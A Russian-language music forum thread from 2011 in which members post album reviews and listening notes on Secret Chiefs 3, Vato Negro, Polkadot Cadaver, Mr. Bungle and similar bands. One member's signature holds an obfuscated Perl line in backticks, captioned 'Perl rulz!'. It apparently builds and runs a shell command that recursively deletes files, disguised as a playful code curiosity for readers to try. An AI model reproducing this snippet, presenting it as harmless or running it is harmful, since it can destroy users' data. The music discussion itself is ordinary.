Предыдущая тема :: Следующая тема |
Автор |
Сообщение |
metronome charisma a.k.a. Наська
|
Добавлено: Пн Мар 07, 2011 1:29 pm Заголовок сообщения: |
|
|
любителем творчества не являюсь, но радость разделить могу |
|
Вернуться к началу |
|
|
|
Добавлено: Пн Мар 28, 2011 9:16 pm Заголовок сообщения: |
|
|
кто-нибудь идёт на системочку? мы с алексом пойдем. ему даже вдвойне повезло - он и в берлине на них попадет. ещё я пойду на muse, школьные годы вспоминать |
|
Вернуться к началу |
|
|
|
Добавлено: Чт Апр 28, 2011 5:41 pm Заголовок сообщения: |
|
|
по рекомендации на last.fm послушала группу Orange Tulip Conspiracy. мне кажется, любителям вольты может понравится. конечно, легче гораздо по звучанию, но иногда что-то проскакивает от марсов хотя это скорее джаз-фьюжн. да, и омара местами напоминает. могу на фтп кинуть флак
http://www.last.fm/music/Orange+Tulip+Conspiracy |
|
Вернуться к началу |
|
|
Maurita widow
|
Добавлено: Сб Май 07, 2011 10:56 pm Заголовок сообщения: |
|
|
Давненько не писала - нашла работу, ибо на марсов поехать очень хочется)
Составлю кратенький список своих основных музыкальный предпочтений, пжалуй
Mars Volta - эт само собой разумеется)
Tool - с подросткового возраста поклоняюся
Gorillaz - всегда и навеки
Placebo - только раннее, все что после Sleeping with Ghosts - ненавижу!
Tricky - самый прекрасный и призрачный в мире шепот
Massive Attack - отцы
Manu Chao - солнце и простое человеческое счастье)
Ska-P - навсегда
Led Zeppelin - короли
Scorpions - детская любовь
Skampararas - прелестный польский ска-панк
Los Cafres - приятный аргентинский реггей
Asian Dub Foundation - даже не знаю что написать)
Еще очень люблю Майкла Джексона. Больше пока ничего не могу вспомнить) |
|
Вернуться к началу |
|
|
|
Добавлено: Сб Май 07, 2011 11:17 pm Заголовок сообщения: |
|
|
|
|
Вернуться к началу |
|
|
|
Добавлено: Вс Май 08, 2011 6:53 pm Заголовок сообщения: |
|
|
мне что-то резко опративел весь мой музон, поэтому уже вторую неделю лазаю по разделу recommendations на last.fm, и слушаю все подряд. открытием для меня стала группа polkadot cadaver, готова часами гонять их первый альбом (второй выходит 10го). много всего накачала, но в основном авангард / экспериментал. ну еще всякие коры, но меньше |
|
Вернуться к началу |
|
|
|
Добавлено: Вс Май 08, 2011 9:32 pm Заголовок сообщения: |
|
|
решили отписываться сюда о некоторых вещах, которые послушали
послушали сегодня vato negro и первый альбом Secret Chiefs 3 (First Grand Constitution and Bylaws). про негров Алеша напишет с удовольствием, ибо мнения у нас одинаковые сложились, тока он может жестко написать про шефов - ну мы реально несколько раз заходились смехом. иногда такая тишина посреди трека, а потом кто-нибудь что-нибудь крикнет невнятное. или один трек был, создалось такое ощущение, будто кто-то ночью пошел в кухню попить в гостях, не знал где свет включается и вот начинают кастрюльки греметь чувак видимо упал, пытается встать, а не может, а кастрюльки всё гремят и гремят
более-менее внятные треки:
Assassin's Blade, Zulkifar |
|
Вернуться к началу |
|
|
ALuserX Черный властелин
|
Добавлено: Вс Май 08, 2011 9:40 pm Заголовок сообщения: |
|
|
раз уж решили отписываться не только о том чего хорошего слушаю, но и вообще о всем что послушал в последнее время, потом можно будет перенести куда-нить, если таких рецензий будет больше
итак, я послушал Ватных Негров (Vato Negro)! нет, на самом деле мне по жизни приходилось много всякой жести и ереси слушать, но такого я точно не слышал еще никогда... многоминутное задрачивание одного и того же сэмпла на басу, совершенно однообразное, под не менее однообразный ритм
наверное просто не мое или их надо исключительно живьем видеть, но тогда зачем нужно было издавать альбом? _________________
`$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
http://www.naushko.ru/voteresult.php?id=105773 |
|
Вернуться к началу |
|
|
|
Добавлено: Вс Май 08, 2011 10:31 pm Заголовок сообщения: |
|
|
второй альбом secret chiefs 3, Second Grand Constitution and Bylaws звучит адекватнее, это слышно с самого начала. открывающий трек, The Rose Garden of Mystery - очень красивая композиция, не верится даже после первого-то альбома, что музыканты эти еще и умеют играть! (да так красиво и даже чувственно) очень нежная, слегка грустная композиция. второй трек, Book T: Broken Glass Hearse, клавишами отсылает к известной мелодии Merv Griffin - "House Of Horrors" (русскоговорящим известный по мультику "Карлсон, который живет на крыше" из-за эпизода на крыше с ворами). третий трек - типа вариации предыдущего, пожестче только. Renunciation - что-то индийско-арабское, восточное, довольно мило и бодренько, вполне спокойно. Только начинаешь думать, что немного затянуто, как трек заканчивается, не успев испортить мнение о себе от Jabalqa попахивает болливудом , но не противно, местами забавные электронные вставки. Под конец правда их слишком уж много может это глюк, но напомнило Apollo 440. после Book T: Orbital Ballroom in the Hall of Destruction, понимаешь, что слышешь что-то давно ушедшее забавное ощущение. и вместе с другими "буками" мне лично напомнило слегка группы лейбла Voodoo Rhythm Records (Die Zorros, Reverend Beat-Man'а и прочих, кто слышал - поймут о чем речь). Далее первая на альбоме песня - Mera Pyar Shalimar, тоже что-то индийское есть, но минимум, остальное даже не знаю, к чему отнести. Знаете есть кисло-сладкий соус? Он кислый и в то же время сладкий © А вот эта песня грустная, а в то же время веселая Zulfikar II - если кто читал мою рецензию на первый альбом, помнит, что там из слушабельного трек с таким названием. это его вариация тащем-та. снова восточное, с драм-машинкой, как и следующий трек. Beyond the Mountain Qaf - адовый нойз единственная композиция, которую я не осилила до конца. последний трек - Hurqalya - переживания такие: пустыня, алладин, арабы О_О потом стопицот минут молчания и невнятных шумов и в самом конце - адская отсылка у первому альбому похоже - просто какая-то... хрень
в целом альбом прекрасненький ^___^ лучше первого, отличных композиций - больше половины, что радует. и, кстати, - забегая немного вперед - поглядела буклеты к следующим альбомам и стало понятно - отныне восточные мотивы - основа их творчества вот так вот. спасибо за внимание, ценю ^____^ |
|
Вернуться к началу |
|
|
|
Добавлено: Вс Май 08, 2011 11:37 pm Заголовок сообщения: |
|
|
Итак, третий альбом Secret Chiefs 3 [Book M] восточные прибамбасы вперемешку с электроникой что характерно для всех треков с этого альбома- они все кажутся очень затянутыми. что не мешает этому альбому быть самым слушаемым. тут также присутствует композиция Zulfikar под номером III, очень интересная вариация, такая для дискотек . вобще мне кажется группа в целом уникальна тем, что все эти восточные мотивы не звучат как один и при желании вы быстро сможете различать композиции по названиям но второй альбом круче
|
|
Вернуться к началу |
|
|
|
Добавлено: Пн Май 09, 2011 4:29 pm Заголовок сообщения: |
|
|
сегодня втыкаю веселенький ирландский фолк-панк Dropkick Murphys Скажу кратко: если вы не большой любитель панка, то с вам хватит треков в топ-15 на ласте мне хватило веселые ребята |
|
Вернуться к началу |
|
|
|
Добавлено: Чт Май 12, 2011 11:08 pm Заголовок сообщения: |
|
|
а новый альбом polkadot cadaver такое же УГ, как все алльбомы DFD -____- превое жутчайшее разочарование со времен октахедрона теперь вся надежда на bad acid trip ^____^ |
|
Вернуться к началу |
|
|
|
Добавлено: Вс Май 15, 2011 4:28 pm Заголовок сообщения: |
|
|
наконец дошли руки до альбома the strokes "angles". группа, которую я слушала в школьные годы, в принципе мало изменилась я помню чем-то вроде выхода за рамки была песня "juicebox", а в целом это все те же старые добрые the strokes. верны стилю, только мне не нравится та электронщина, которую они потихоньку любят добавлять к себе в песни |
|
Вернуться к началу |
|
|
|
Добавлено: Пн Май 16, 2011 6:43 pm Заголовок сообщения: |
|
|
слушаю (если честно местами через силу) estradasphere. ну слишком экспериментально. мешают все, что не попадя если я правильно поняла, то это очередной проект гитариста, играющего также в mr. bungle, orange tulip conspiracy и secret chiefs 3. следовательно, и музыка вмещает в себя по солидному куску от каждего из вышеупомянутых проектов |
|
Вернуться к началу |
|
|
Ила miranda
|
Добавлено: Пн Май 16, 2011 6:55 pm Заголовок сообщения: |
|
|
Фрусчанте, с первого до последнего сольника, он создает мою музыкальную весну |
|
Вернуться к началу |
|
|
|
Добавлено: Пн Май 16, 2011 7:05 pm Заголовок сообщения: |
|
|
Ила
как раз собираюсь за него взяться конкретно так в ближайшее время надеюсь, сессия не сильно помешает |
|
Вернуться к началу |
|
|
|
Добавлено: Пн Май 16, 2011 10:53 pm Заголовок сообщения: |
|
|
послушала Ideamen. довольно неплохой рочок с элементами экспериментала ^___^ (изъясняюсь размыто, но лучше один раз УСЛЫШАТЬ, чем сто раз "услышать"! ) |
|
Вернуться к началу |
|
|
|
Добавлено: Ср Май 18, 2011 11:16 pm Заголовок сообщения: |
|
|
слушаю serart и офигеваю просто. непередаваемая атмосфера о_О альбом создает какое-то уникальное настроение, описать словами не возможно. мне только кажется англоязычные тексты как-то немного не в тему что ли... а так, блин, просто волшебная, магическая какая-то музыка. очаровывает. я никогда наверное не чувствовала себя такой расслабленой во время прослушивания музыки. (ну, если учесть, что я вобще не любитель медляков и не учитывать мое настроение, когда я джемлюсь с музыкантами) очень интересный и по-своему ункальный проект. |
|
Вернуться к началу |
|
|
|
Добавлено: Чт Май 19, 2011 8:03 pm Заголовок сообщения: |
|
|
послушала проект паттона peeping tom - охрененно!!! ^___^ |
|
Вернуться к началу |
|
|
|
Добавлено: Ср Июн 15, 2011 9:31 pm Заголовок сообщения: |
|
|
странные вещи творятся со мной в сессию... слушаю музыку примерно так:
polkadot cadaver - fantomas - mr. bungle - melt banana - fantomas - fantomas - fantomas - mr. bungle - polkadot cadaver - buckethead - peeping tom - mr. bungle - buckethead - el stew - polkadot cadaver |
|
Вернуться к началу |
|
|
|
|